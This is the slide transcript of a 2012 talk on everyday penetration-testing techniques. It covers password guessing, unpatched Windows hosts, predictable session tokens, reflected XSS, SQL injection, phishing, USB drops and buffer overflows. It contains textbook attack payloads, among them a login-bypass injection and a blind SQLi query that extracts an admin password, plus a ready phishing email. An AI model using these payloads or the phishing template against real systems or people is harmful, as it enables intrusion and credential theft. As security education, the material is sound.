Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Hacking the Box (Joseph Sheridan)

Hacking the Box (Joseph Sheridan)

Speaker: Joseph Sheridan (http://goo.gl/9cMJ8)
Slides by Chris Cooper and Joseph Sheridan.

Penetration tester and ethical hacker Joseph Sheridan takes you through some of the day-to-day hacks utilised during a security engagement.

Presented at #Digibury 007.
http://deeson-online.co.uk/digibury/007

Chris Cooper

July 11, 2012
Tweet

More Decks by Chris Cooper

Other Decks in Technology

Transcript

  1. [email protected]
    Joseph Sheridan
    Started Reaction in 2009
    Locally based
    CESG CHECK registered

    View full-size slide

  2. penetration testing
    aka ethical hacking, pentesting, white hat hacking etc…
    introduction
    What is penetration testing?
    What will be covered today?

    View full-size slide

  3. penetration testing
    aka ethical hacking, pentesting, white hat hacking etc…
    Services
    • Network infrastructure
    • Web apps
    • Host build reviews
    • Wireless networks
    • Database security

    View full-size slide

  4. HACKING
    MAINFRAME
    THE
    testing network infrastructure

    View full-size slide

  5. domain admin in under
    30mins
    guess passwords
    the easy way in?
    < this actually happens
    password policy

    View full-size slide

  6. the easy way in?
    the awful passwords we find:
    Blank
    • SQL Server
    • Gary McKinnon blank root pentagon
    Password01
    Company name
    Football team
    Swear words
    Their own username

    View full-size slide

  7. more easiness
    look for unpatched servers
    e.g. how about an internet-facing
    host with no firewall and missing
    critical security patches
    MS04-011
    MS06-040
    MS08-067
    MS09-050
    / LSASS
    / Canonicalisation
    / Netapi
    / Negotiate Function Table

    View full-size slide

  8. MS09-050
    owned over
    the internet

    View full-size slide

  9. password cracking
    dictionary attack
    brute-force
    rainbow tables

    View full-size slide

  10. sharing != caring
    when you have found a password
    for… oh, say a local administrator account
    chances of another
    account having the
    same
    password
    = HIGH

    View full-size slide

  11. HACKING
    INTERNET
    THE
    testing web applications

    View full-size slide

  12. user enumeration
    knowing a list of users makes
    brute-forcing
    significantly easier

    View full-size slide

  13. stale cookies
    a user’s account is
    session
    only as secure as his
    token

    View full-size slide

  14. stale cookies
    e.g. once upon a time, we found the following
    session token…
    MDEzODM0MDg4NzM=
    which translates from Base64 to…
    0 1 3 8 3 4 0 8 8 7 3
    always zero random sequential (every login)
    get any active session by enumerating through
    9999 values (approx 10mins in this case)

    View full-size slide

  15. xss
    No results found for
    =$_GET[“search"]?>
    http://mysite.com/?search=

    View full-size slide

  16. xss
    No results found for
    =$_GET[“search"]?>
    http://mysite.com/?search=
    payload: alert(‘xsstest’)

    View full-size slide

  17. xss
    No results found for
    =$_GET[“search"]?>
    script>alert(‘xsstest’)
    payload: alert(‘xsstest’)

    View full-size slide

  18. xss
    No results found for
    alert(‘xsstest’)<br/>
    script>alert(‘xsstest’)
    payload: alert(‘xsstest’)

    View full-size slide

  19. xss
    No results found for
    alert(‘xsstest’)<br/>
    script>alert(‘xsstest’)
    payload: alert(‘xsstest’)
    xsstest
    Alert!

    View full-size slide

  20. SQLi
    Enter your username and password:
    Go!
    $query = “SELECT id FROM users
    WHERE uname=‘ ’
    “ . $username . “
    AND pword=‘ “ . $password . “ ’”
    joebloggs *********

    View full-size slide

  21. SQLi
    joebloggs
    Enter your username and password:
    Go!
    $query = “SELECT id FROM users
    WHERE uname=‘ ’
    *********
    joebloggs
    AND pword=‘ ‘ OR 1=1# ’”

    View full-size slide

  22. SQLi
    joebloggs
    Enter your username and password:
    Go!
    $query = “SELECT id FROM users
    WHERE uname=‘joebloggs’
    *********
    AND pword=‘‘ OR 1=1#’”

    View full-size slide

  23. blind SQLi
    ‘ and if(substring((SELECT pword FROM
    users WHERE uname='admin‘), 1, 1)=‘a’,
    benchmark(500000, MD5(‘!’)),
    0)

    View full-size slide

  24. HACKING
    PEOPLE
    social engineering

    View full-size slide

  25. phishing
    From: Company IT Helpdesk
    To: Fred Jones
    Subject: IT Helpdesk Important Information – Action Required
    Dear Fred,
    We have detected suspicious activity relating to your Company account. As a precaution,
    we require you to verify your details using the password management system. Failure to do
    so may result in revocation of your user rights.
    Please copy and paste the following URL into your browser:
    http://security.company.com/pm/?verify=982364925874578955
    IT Dept. Company
    [email protected]
    This email and any files transmitted with it are confidential and are intended solely for
    the use of the individual to whom they are addressed. If you are not the intended
    recipient please notify the sender. Any unauthorised dissemination or copying of this
    email or its attachments and any use or disclosure of any information contained in them,
    is strictly prohibited.
    Please consider the environment before printing this email.

    View full-size slide

  26. phishing
    users were directed to a
    mirrored login on our server
    how many fell for it?
    9
    /60

    View full-size slide

  27. USB drop
    could be preloaded with malware
    or spawn outgoing connections
    leave them lying around / curiosity
    hand them in to receptionist / helpfulness

    View full-size slide

  28. EXPLOITS:
    researching software vulnerabilities
    THE MAKING OF

    View full-size slide

  29. buffer overflows
    ScriptFu
    console

    View full-size slide

  30. buffer overflows

    View full-size slide

  31. overflows
    buffer
    • return address
    • shellcode
    exploit contains:

    View full-size slide

  32. THE
    [email protected]
    reaction information security, canterbury

    View full-size slide